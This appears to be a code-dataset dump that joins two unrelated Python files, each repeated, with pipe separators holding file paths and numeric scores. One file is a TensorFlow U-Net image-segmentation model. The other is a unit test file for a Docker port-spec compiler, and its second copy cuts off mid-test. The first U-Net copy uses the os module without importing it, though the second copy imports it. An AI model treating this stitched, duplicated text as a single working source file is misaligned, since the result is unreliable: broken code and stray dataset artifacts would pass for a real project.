import numpy as np
import tensorflow as tf
from datetime import datetime
from skimage import img_as_int, io
from unet.unet_components import weight_init, bias_init, conv2d, max_pool, deconv2d, crop_and_copy
from unet.loss import dice_loss
from unet.metrics import mean_iou
from utils import get_imgs_masks, get_batch_data
class UnetModel(object):
def __init__(self, learning_rate=0.0001, batch_size=2, model_depth=5, conv_ops=2, k_size=3,
pool_size=2, feature_maps_root=16, dropout_rate=0.2):
"""
Initialization
:param learning_rate: learning rate set for the network
:param batch_size: batch size of the image
:param model_depth: the depth of the model, recommended no less than 4 (>= 4)
:param conv_ops: the convolution block
:param k_size: kernel size of the filter, default k_size=3
:param pool_size: pooling size, default = 2
:param feature_maps_root: the base feature map/channels
:param dropout_rate: the dropout rate for the network
"""
self.x = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 512, 512, 1], name="x_input")
self.y = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 512, 512, 1], name="y_label")
self.learning_rate = learning_rate
self.batch_size = batch_size
self.model_depth = model_depth
self.conv_ops = conv_ops
self.k_size = k_size
self.pool_size = pool_size
self.feat_maps_root = feature_maps_root
self.dropout_rate = dropout_rate
def build_model(self, X):
"""
the whole training process, accept only one input: X
:param X: the input image
:return: output
"""
# Extraction Path
convs_rslt = [] # to save intermediate results of each convolution block 2 * conv followed by one maxpool
for depth in range(self.model_depth):
print("the down level is: ", depth)
feature_maps = 2 ** depth * self.feat_maps_root
print("Feature maps = ", feature_maps)
stddev = tf.sqrt(2 / (self.k_size ** 2 * feature_maps))
convs_temp = []
conv = convs_rslt[depth - 1][1] if convs_rslt else X
for conv_op in range(self.conv_ops):
if depth == 0:
input_feat_channels = tf.shape(X)[3]
else:
input_feat_channels = tf.shape(convs_rslt[depth - 1][0][1])[3]
W = weight_init(w_shape=(self.k_size, self.k_size, input_feat_channels, feature_maps), std=stddev)
b = bias_init(value=0.1, shape=[feature_maps], name="bias_{0}_{1}".format(depth, conv_op))
if depth == 0:
conv = conv2d(X=conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("After convolution: ", conv.shape)
convs_temp.append(conv)
else:
conv = conv2d(X=conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(conv)
print("After convolution: ", conv.shape)
convs_temp.append(conv)
if depth == self.model_depth - 1:
rslt_for_deconv = convs_temp[1]
print("After downsampling, the shape is: ", rslt_for_deconv.shape)
convs_rslt.append(convs_temp)
else:
pool = max_pool(convs_temp[1])
# X = pool
print("After max pooling: ", pool.shape)
print("\n")
convs_rslt.append(
(convs_temp, pool)) # conv_rslt[0][1], conv_rslt[1][1], conv_rslt[2][1], conv_rslt[3][1]
# Expansive Path
print("\n")
deconv_rslt = []
step = -1
for depth in range(self.model_depth - 2, -1, -1):
print("The up level is: ", depth)
feature_maps = 2 ** (depth + 1) * self.feat_maps_root
print("the up feature maps are: ", feature_maps)
stddev = tf.sqrt(2 / (self.k_size ** 2 * feature_maps))
# conv = X
conv = convs_rslt[-1][1] if depth == self.model_depth - 2 else deconv_rslt[step][1]
W_d = weight_init(w_shape=[self.pool_size, self.pool_size, feature_maps // 2, feature_maps], std=stddev)
# print(W_d.shape)
b_d = bias_init(value=0.1, shape=[feature_maps // 2], name="up_bias_{0}".format(depth))
# print(b_d.shape)
deconv = deconv2d(conv, W=W_d, strides=self.pool_size)
concat_deconv_conv = crop_and_copy(convs_rslt[depth][0][1], deconv)
print("After deconv: ", deconv.shape)
print("concat result: ", concat_deconv_conv.shape)
# X = concat_deconv_conv
convs_temp = []
for conv_op in range(self.conv_ops):
b = bias_init(value=0.1, shape=[feature_maps // 2], name="up_bias_{0}_{1}".format(depth, conv_op))
if conv_op == 0:
W = weight_init(w_shape=[self.k_size, self.k_size, feature_maps, feature_maps // 2], std=stddev)
conv = conv2d(X=concat_deconv_conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("Shape of data after upsamling and convolution: ", conv.shape)
else:
W = weight_init(w_shape=[self.k_size, self.k_size, feature_maps // 2, feature_maps // 2], std=stddev)
conv = conv2d(X=convs_temp[0], W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("Shape of data after upsamling and convolution: ", conv.shape)
# X = conv
convs_temp.append(conv)
# print("The length is: ", len(convs_temp))
deconv_rslt.append(convs_temp)
step += 1
print("\n")
with tf.name_scope("final_output"):
stddev = tf.sqrt(2 / (self.k_size ** 2 * self.feat_maps_root))
W = weight_init(w_shape=(1, 1, self.feat_maps_root, 1), std=stddev)
b = bias_init(value=0.1, shape=[1], name="final_out_bias")
output = conv2d(X=deconv_rslt[-1][1], W=W, b=b, rate=0.1)
output = tf.nn.sigmoid(output, name="sigmoid_out")
tf.add_to_collection("network_architecture", output)
print("final output shape", output.shape)
return output
def train(self, data_gen, images, labels, n_epochs, n_samples):
"""
Training unet model
:param data_gen: data generator to yield image for training
:param images: the whole dataset of images
:param labels: the whole dataset of mask images
:param n_epochs: number of epochs for training
:param n_samples: total training samples
:return: None
"""
# Create logs directory to store training summary of the model
create_time = datetime.utcnow().strftime("%Y%m%d%H%M%S")
root_log_dir = "../logs"
if not os.path.exists(root_log_dir):
os.mkdir(root_log_dir)
tf_train_logs = "{}/run-{}".format(root_log_dir, create_time)
if not os.path.exists(tf_train_logs):
os.mkdir(tf_train_logs)
logits = self.build_model(self.x)
with tf.name_scope("training_op"):
loss = self.get_loss(y_true=self.y, y_preds=logits, loss_mode="dice_loss")
optimizer = self.get_optimizer(opt="Adam")
training_op = optimizer.minimize(loss, name="training_op")
with tf.name_scope("mean_iou"):
miou = mean_iou(y_true=self.y, y_pred=logits)
with tf.name_scope("save_training_summary"):
loss_summary = tf.compat.v1.summary.scalar(name="Dice_Loss", tensor=loss)
iou_summary = tf.compat.v1.summary.scalar(name="IOU", tensor=miou)
file_writer = tf.compat.v1.summary.FileWriter(tf_train_logs, tf.compat.v1.get_default_graph())
init = tf.compat.v1.global_variables_initializer()
init_local = tf.compat.v1.local_variables_initializer()
with tf.compat.v1.Session() as sess:
init.run()
init_local.run()
training_steps_per_epoch = n_samples // self.batch_size
for epoch in range(n_epochs):
print("Start training epoch {}".format(epoch + 1))
total_loss = 0
for step in range(training_steps_per_epoch):
x_batch, y_batch = data_gen(images, labels, step, self.batch_size)
loss_val, _ = sess.run([loss, training_op], feed_dict={self.x: x_batch, self.y: y_batch})
total_loss += loss_val
train_iou = miou.eval(feed_dict={self.x: x_batch, self.y: y_batch})
print("Epoch: {:}, Average loss: {:.4f}, Mean IOU: {:.4f}".format(epoch + 1,
total_loss / training_steps_per_epoch,
train_iou))
print("\n")
train_loss_summary = loss_summary.eval(feed_dict={self.x: x_batch, self.y: y_batch})
train_iou_summary = iou_summary.eval(feed_dict={self.x: x_batch, self.y: y_batch})
file_writer.add_summary(train_loss_summary, epoch)
file_writer.add_summary(train_iou_summary, epoch)
_ = self.dump_model(sess, "../models/tf_model.ckpt")
file_writer.close()
@staticmethod
def get_loss(y_true, y_preds, loss_mode="dice_loss"):
with tf.name_scope("loss"):
if loss_mode == "dice_loss":
loss = dice_loss(y_true=y_true, y_pred=y_preds)
elif loss_mode == "cross_entropy":
y_true_flattened = tf.reshape(y_true, [-1])
y_preds_flattened = tf.reshape(y_preds, [-1])
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true_flattened,
logits=y_preds_flattened))
else:
raise ValueError("Unknown Cost Function: %s" % loss_mode)
return tf.convert_to_tensor(loss)
def get_optimizer(self, opt="Adam"):
with tf.name_scope("optimizer"):
if opt == "Adam":
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate)
elif opt == "SGD":
optimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=self.learning_rate)
return optimizer
def predict(self, x_test, y_test, model_path):
"""
Use to predict batch data so as to get predicted results
:param x_test: the test images
:param y_test: the test masks
:param model_path: the path stores trained model
:return: predictions (uint8)
"""
tf.reset_default_graph()
with tf.compat.v1.Session() as sess:
saver = tf.compat.v1.train.import_meta_graph(model_path + ".meta")
saver.restore(sess, model_path)
graph = tf.compat.v1.get_default_graph()
x = graph.get_operation_by_name("x_input").outputs[0]
y = tf.compat.v1.get_collection("network_architecture")[0]
no_samples = x_test.shape[0]
predictions = []
n_iteration = no_samples // self.batch_size
for step in range(n_iteration):
x_batch, y_batch = get_batch_data(x_test, y_test, iter_step=step, batch_size=self.batch_size)
preds = sess.run(y, feed_dict={x: x_batch})
predictions.append(preds)
return predictions
@staticmethod
def save_images(predictions, segmented_folder):
if not os.path.exists(segmented_folder):
os.mkdir(segmented_folder)
for i, batch_preds in enumerate(predictions):
batch_preds = (batch_preds >= 0.5).astype(np.uint8)
n_images = batch_preds.shape[0]
for j in range(n_images):
img_arr = img_as_int(np.squeeze(batch_preds[j]))
io.imsave(fname=segmented_folder + "/img_{}_{}.png".format(i, j), arr=img_arr)
@staticmethod
def dump_model(sess, model_path):
saver = tf.compat.v1.train.Saver()
saved_path = saver.save(sess, model_path)
print("Model has been saved into disk at path: %s" % saved_path)
return saved_path
@staticmethod
def load_model(sess, model_path):
saver = tf.compat.v1.train.import_meta_graph(model_path + ".meta")
saver.restore(sess, tf.compat.v1.train.latest_checkpoint("./"))
print("Model Loaded!")
if __name__ == "__main__":
image_folder = "../data/2d_images/"
masks_folder = "../data/2d_masks/"
# # tr_paths, v_paths = get_train_val_paths(image_folder, masks_folder)
images, labels = get_imgs_masks(image_folder, masks_folder)
# print(images[0].shape)
no_samples = images.shape[0]
n_epochs = 10
unet = UnetModel()
unet.train(data_gen=get_batch_data, images=images, labels=labels, n_epochs=n_epochs, n_samples=no_samples)
test_preds = unet.predict(images, labels, "../models/tf_model.ckpt")
unet.save_images(predictions=test_preds, segmented_folder="./segmented_results") | unet/unet_model.py | import os
import numpy as np
import tensorflow as tf
from datetime import datetime
from skimage import img_as_int, io
from unet.unet_components import weight_init, bias_init, conv2d, max_pool, deconv2d, crop_and_copy
from unet.loss import dice_loss
from unet.metrics import mean_iou
from utils import get_imgs_masks, get_batch_data
class UnetModel(object):
def __init__(self, learning_rate=0.0001, batch_size=2, model_depth=5, conv_ops=2, k_size=3,
pool_size=2, feature_maps_root=16, dropout_rate=0.2):
"""
Initialization
:param learning_rate: learning rate set for the network
:param batch_size: batch size of the image
:param model_depth: the depth of the model, recommended no less than 4 (>= 4)
:param conv_ops: the convolution block
:param k_size: kernel size of the filter, default k_size=3
:param pool_size: pooling size, default = 2
:param feature_maps_root: the base feature map/channels
:param dropout_rate: the dropout rate for the network
"""
self.x = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 512, 512, 1], name="x_input")
self.y = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 512, 512, 1], name="y_label")
self.learning_rate = learning_rate
self.batch_size = batch_size
self.model_depth = model_depth
self.conv_ops = conv_ops
self.k_size = k_size
self.pool_size = pool_size
self.feat_maps_root = feature_maps_root
self.dropout_rate = dropout_rate
def build_model(self, X):
"""
the whole training process, accept only one input: X
:param X: the input image
:return: output
"""
# Extraction Path
convs_rslt = [] # to save intermediate results of each convolution block 2 * conv followed by one maxpool
for depth in range(self.model_depth):
print("the down level is: ", depth)
feature_maps = 2 ** depth * self.feat_maps_root
print("Feature maps = ", feature_maps)
stddev = tf.sqrt(2 / (self.k_size ** 2 * feature_maps))
convs_temp = []
conv = convs_rslt[depth - 1][1] if convs_rslt else X
for conv_op in range(self.conv_ops):
if depth == 0:
input_feat_channels = tf.shape(X)[3]
else:
input_feat_channels = tf.shape(convs_rslt[depth - 1][0][1])[3]
W = weight_init(w_shape=(self.k_size, self.k_size, input_feat_channels, feature_maps), std=stddev)
b = bias_init(value=0.1, shape=[feature_maps], name="bias_{0}_{1}".format(depth, conv_op))
if depth == 0:
conv = conv2d(X=conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("After convolution: ", conv.shape)
convs_temp.append(conv)
else:
conv = conv2d(X=conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(conv)
print("After convolution: ", conv.shape)
convs_temp.append(conv)
if depth == self.model_depth - 1:
rslt_for_deconv = convs_temp[1]
print("After downsampling, the shape is: ", rslt_for_deconv.shape)
convs_rslt.append(convs_temp)
else:
pool = max_pool(convs_temp[1])
# X = pool
print("After max pooling: ", pool.shape)
print("\n")
convs_rslt.append(
(convs_temp, pool)) # conv_rslt[0][1], conv_rslt[1][1], conv_rslt[2][1], conv_rslt[3][1]
# Expansive Path
print("\n")
deconv_rslt = []
step = -1
for depth in range(self.model_depth - 2, -1, -1):
print("The up level is: ", depth)
feature_maps = 2 ** (depth + 1) * self.feat_maps_root
print("the up feature maps are: ", feature_maps)
stddev = tf.sqrt(2 / (self.k_size ** 2 * feature_maps))
# conv = X
conv = convs_rslt[-1][1] if depth == self.model_depth - 2 else deconv_rslt[step][1]
W_d = weight_init(w_shape=[self.pool_size, self.pool_size, feature_maps // 2, feature_maps], std=stddev)
# print(W_d.shape)
b_d = bias_init(value=0.1, shape=[feature_maps // 2], name="up_bias_{0}".format(depth))
# print(b_d.shape)
deconv = deconv2d(conv, W=W_d, strides=self.pool_size)
concat_deconv_conv = crop_and_copy(convs_rslt[depth][0][1], deconv)
print("After deconv: ", deconv.shape)
print("concat result: ", concat_deconv_conv.shape)
# X = concat_deconv_conv
convs_temp = []
for conv_op in range(self.conv_ops):
b = bias_init(value=0.1, shape=[feature_maps // 2], name="up_bias_{0}_{1}".format(depth, conv_op))
if conv_op == 0:
W = weight_init(w_shape=[self.k_size, self.k_size, feature_maps, feature_maps // 2], std=stddev)
conv = conv2d(X=concat_deconv_conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("Shape of data after upsamling and convolution: ", conv.shape)
else:
W = weight_init(w_shape=[self.k_size, self.k_size, feature_maps // 2, feature_maps // 2], std=stddev)
conv = conv2d(X=convs_temp[0], W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("Shape of data after upsamling and convolution: ", conv.shape)
# X = conv
convs_temp.append(conv)
# print("The length is: ", len(convs_temp))
deconv_rslt.append(convs_temp)
step += 1
print("\n")
with tf.name_scope("final_output"):
stddev = tf.sqrt(2 / (self.k_size ** 2 * self.feat_maps_root))
W = weight_init(w_shape=(1, 1, self.feat_maps_root, 1), std=stddev)
b = bias_init(value=0.1, shape=[1], name="final_out_bias")
output = conv2d(X=deconv_rslt[-1][1], W=W, b=b, rate=0.1)
output = tf.nn.sigmoid(output, name="sigmoid_out")
tf.add_to_collection("network_architecture", output)
print("final output shape", output.shape)
return output
def train(self, data_gen, images, labels, n_epochs, n_samples):
"""
Training unet model
:param data_gen: data generator to yield image for training
:param images: the whole dataset of images
:param labels: the whole dataset of mask images
:param n_epochs: number of epochs for training
:param n_samples: total training samples
:return: None
"""
# Create logs directory to store training summary of the model
create_time = datetime.utcnow().strftime("%Y%m%d%H%M%S")
root_log_dir = "../logs"
if not os.path.exists(root_log_dir):
os.mkdir(root_log_dir)
tf_train_logs = "{}/run-{}".format(root_log_dir, create_time)
if not os.path.exists(tf_train_logs):
os.mkdir(tf_train_logs)
logits = self.build_model(self.x)
with tf.name_scope("training_op"):
loss = self.get_loss(y_true=self.y, y_preds=logits, loss_mode="dice_loss")
optimizer = self.get_optimizer(opt="Adam")
training_op = optimizer.minimize(loss, name="training_op")
with tf.name_scope("mean_iou"):
miou = mean_iou(y_true=self.y, y_pred=logits)
with tf.name_scope("save_training_summary"):
loss_summary = tf.compat.v1.summary.scalar(name="Dice_Loss", tensor=loss)
iou_summary = tf.compat.v1.summary.scalar(name="IOU", tensor=miou)
file_writer = tf.compat.v1.summary.FileWriter(tf_train_logs, tf.compat.v1.get_default_graph())
init = tf.compat.v1.global_variables_initializer()
init_local = tf.compat.v1.local_variables_initializer()
with tf.compat.v1.Session() as sess:
init.run()
init_local.run()
training_steps_per_epoch = n_samples // self.batch_size
for epoch in range(n_epochs):
print("Start training epoch {}".format(epoch + 1))
total_loss = 0
for step in range(training_steps_per_epoch):
x_batch, y_batch = data_gen(images, labels, step, self.batch_size)
loss_val, _ = sess.run([loss, training_op], feed_dict={self.x: x_batch, self.y: y_batch})
total_loss += loss_val
train_iou = miou.eval(feed_dict={self.x: x_batch, self.y: y_batch})
print("Epoch: {:}, Average loss: {:.4f}, Mean IOU: {:.4f}".format(epoch + 1,
total_loss / training_steps_per_epoch,
train_iou))
print("\n")
train_loss_summary = loss_summary.eval(feed_dict={self.x: x_batch, self.y: y_batch})
train_iou_summary = iou_summary.eval(feed_dict={self.x: x_batch, self.y: y_batch})
file_writer.add_summary(train_loss_summary, epoch)
file_writer.add_summary(train_iou_summary, epoch)
_ = self.dump_model(sess, "../models/tf_model.ckpt")
file_writer.close()
@staticmethod
def get_loss(y_true, y_preds, loss_mode="dice_loss"):
with tf.name_scope("loss"):
if loss_mode == "dice_loss":
loss = dice_loss(y_true=y_true, y_pred=y_preds)
elif loss_mode == "cross_entropy":
y_true_flattened = tf.reshape(y_true, [-1])
y_preds_flattened = tf.reshape(y_preds, [-1])
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true_flattened,
logits=y_preds_flattened))
else:
raise ValueError("Unknown Cost Function: %s" % loss_mode)
return tf.convert_to_tensor(loss)
def get_optimizer(self, opt="Adam"):
with tf.name_scope("optimizer"):
if opt == "Adam":
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate)
elif opt == "SGD":
optimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=self.learning_rate)
return optimizer
def predict(self, x_test, y_test, model_path):
"""
Use to predict batch data so as to get predicted results
:param x_test: the test images
:param y_test: the test masks
:param model_path: the path stores trained model
:return: predictions (uint8)
"""
tf.reset_default_graph()
with tf.compat.v1.Session() as sess:
saver = tf.compat.v1.train.import_meta_graph(model_path + ".meta")
saver.restore(sess, model_path)
graph = tf.compat.v1.get_default_graph()
x = graph.get_operation_by_name("x_input").outputs[0]
y = tf.compat.v1.get_collection("network_architecture")[0]
no_samples = x_test.shape[0]
predictions = []
n_iteration = no_samples // self.batch_size
for step in range(n_iteration):
x_batch, y_batch = get_batch_data(x_test, y_test, iter_step=step, batch_size=self.batch_size)
preds = sess.run(y, feed_dict={x: x_batch})
predictions.append(preds)
return predictions
@staticmethod
def save_images(predictions, segmented_folder):
if not os.path.exists(segmented_folder):
os.mkdir(segmented_folder)
for i, batch_preds in enumerate(predictions):
batch_preds = (batch_preds >= 0.5).astype(np.uint8)
n_images = batch_preds.shape[0]
for j in range(n_images):
img_arr = img_as_int(np.squeeze(batch_preds[j]))
io.imsave(fname=segmented_folder + "/img_{}_{}.png".format(i, j), arr=img_arr)
@staticmethod
def dump_model(sess, model_path):
saver = tf.compat.v1.train.Saver()
saved_path = saver.save(sess, model_path)
print("Model has been saved into disk at path: %s" % saved_path)
return saved_path
@staticmethod
def load_model(sess, model_path):
saver = tf.compat.v1.train.import_meta_graph(model_path + ".meta")
saver.restore(sess, tf.compat.v1.train.latest_checkpoint("./"))
print("Model Loaded!")
if __name__ == "__main__":
image_folder = "../data/2d_images/"
masks_folder = "../data/2d_masks/"
# # tr_paths, v_paths = get_train_val_paths(image_folder, masks_folder)
images, labels = get_imgs_masks(image_folder, masks_folder)
# print(images[0].shape)
no_samples = images.shape[0]
n_epochs = 10
unet = UnetModel()
unet.train(data_gen=get_batch_data, images=images, labels=labels, n_epochs=n_epochs, n_samples=no_samples)
test_preds = unet.predict(images, labels, "../models/tf_model.ckpt")
unet.save_images(predictions=test_preds, segmented_folder="./segmented_results") | 0.746693 | 0.545528 |
from mock import patch
from ....testcases import DustyTestCase
from dusty.compiler.port_spec import (_docker_compose_port_spec, _nginx_port_spec,
_hosts_file_port_spec, get_port_spec_document,
ReusedHostFullAddress, ReusedStreamHostPort)
class TestPortSpecCompiler(DustyTestCase):
def setUp(self):
super(TestPortSpecCompiler, self).setUp()
self.test_host_forwarding_spec_1 = {'container_port': 80, 'host_name': 'local.gc.com', 'host_port': 80, 'type': 'http'}
self.test_host_forwarding_spec_2 = {'container_port': 8000, 'host_name': 'local.alex.com', 'host_port': 8001, 'type': 'http'}
self.test_host_forwarding_spec_3 = {'container_port': 22, 'host_name': 'local.ssh.com', 'host_port': 8000, 'type': 'stream'}
def test_docker_compose_port_spec_1(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_1, '65000'),
{'in_container_port': '80',
'mapped_host_port': '65000'})
def test_docker_compose_port_spec_2(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_2, '65001'),
{'in_container_port': '8000',
'mapped_host_port': '65001'})
def test_docker_compose_port_spec_3(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_3, '65001'),
{'in_container_port': '22',
'mapped_host_port': '65001'})
def test_nginx_port_spec_1(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_1, '65000', '192.168.5.10'),
{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'})
def test_nginx_port_spec_2(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_2, '65001', '192.168.5.10'),
{'proxied_port': '65001',
'host_address': 'local.alex.com',
'host_port': '8001',
'type': 'http'})
def test_nginx_port_spec_3(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_3, '65001', '192.168.5.10'),
{'proxied_port': '65001',
'host_address': 'local.ssh.com',
'host_port': '8000',
'type': 'stream'})
def test_hosts_file_port_spec_1(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_1),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.gc.com'})
def test_hosts_file_port_spec_2(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_2),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.alex.com'})
def test_hosts_file_port_spec_3(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_3),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.ssh.com'})
def test_get_port_spec_document_1_app(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_get_port_spec_document_2_apps(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gcapi.com',
'host_port': 8000,
'container_port': 8001,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'}],
'gcapi':[{'in_container_port': '8001',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gcapi.com',
'host_port': '8000',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gcapi.com'},
{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_get_port_spec_document_2_apps_same_host_port(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 8000,
'container_port': 8001,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'}],
'gcapi':[{'in_container_port': '8001',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '8000',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.maxDiff = None
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_port_spec_throws_full_address_error(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 81,
'type': 'http'}]}}}
with self.assertRaises(ReusedHostFullAddress):
get_port_spec_document(expanded_spec, '192.168.5.10')
def test_port_spec_throws_stream_host_port(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'stream'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.api.com',
'host_port': 80,
'container_port': 81,
'type': 'stream'}]}}}
with self.assertRaises(ReusedStreamHostPort):
get_port_spec_document(expanded_spec, '192.168.5.10')
def test_app_with_multiple_host_forwardings(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'},
{'host_name': 'local.gc.com',
'host_port': 81,
'container_port': 81,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gcapi.com',
'host_port': 82,
'container_port': 82,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'},
{'in_container_port': '81',
'mapped_host_port': '65002'}],
'gcapi':[{'in_container_port': '82',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gcapi.com',
'host_port': '82',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'},
{'proxied_port': '65002',
'host_address': 'local.gc.com',
'host_port': '81',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gcapi.com'},
{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec) | tests/unit/compiler/port_spec/init_test.py | from mock import patch
from ....testcases import DustyTestCase
from dusty.compiler.port_spec import (_docker_compose_port_spec, _nginx_port_spec,
_hosts_file_port_spec, get_port_spec_document,
ReusedHostFullAddress, ReusedStreamHostPort)
class TestPortSpecCompiler(DustyTestCase):
def setUp(self):
super(TestPortSpecCompiler, self).setUp()
self.test_host_forwarding_spec_1 = {'container_port': 80, 'host_name': 'local.gc.com', 'host_port': 80, 'type': 'http'}
self.test_host_forwarding_spec_2 = {'container_port': 8000, 'host_name': 'local.alex.com', 'host_port': 8001, 'type': 'http'}
self.test_host_forwarding_spec_3 = {'container_port': 22, 'host_name': 'local.ssh.com', 'host_port': 8000, 'type': 'stream'}
def test_docker_compose_port_spec_1(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_1, '65000'),
{'in_container_port': '80',
'mapped_host_port': '65000'})
def test_docker_compose_port_spec_2(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_2, '65001'),
{'in_container_port': '8000',
'mapped_host_port': '65001'})
def test_docker_compose_port_spec_3(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_3, '65001'),
{'in_container_port': '22',
'mapped_host_port': '65001'})
def test_nginx_port_spec_1(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_1, '65000', '192.168.5.10'),
{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'})
def test_nginx_port_spec_2(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_2, '65001', '192.168.5.10'),
{'proxied_port': '65001',
'host_address': 'local.alex.com',
'host_port': '8001',
'type': 'http'})
def test_nginx_port_spec_3(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_3, '65001', '192.168.5.10'),
{'proxied_port': '65001',
'host_address': 'local.ssh.com',
'host_port': '8000',
'type': 'stream'})
def test_hosts_file_port_spec_1(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_1),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.gc.com'})
def test_hosts_file_port_spec_2(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_2),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.alex.com'})
def test_hosts_file_port_spec_3(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_3),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.ssh.com'})
def test_get_port_spec_document_1_app(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_get_port_spec_document_2_apps(self):
expanded_spec = {'apps':
{'gcweb':
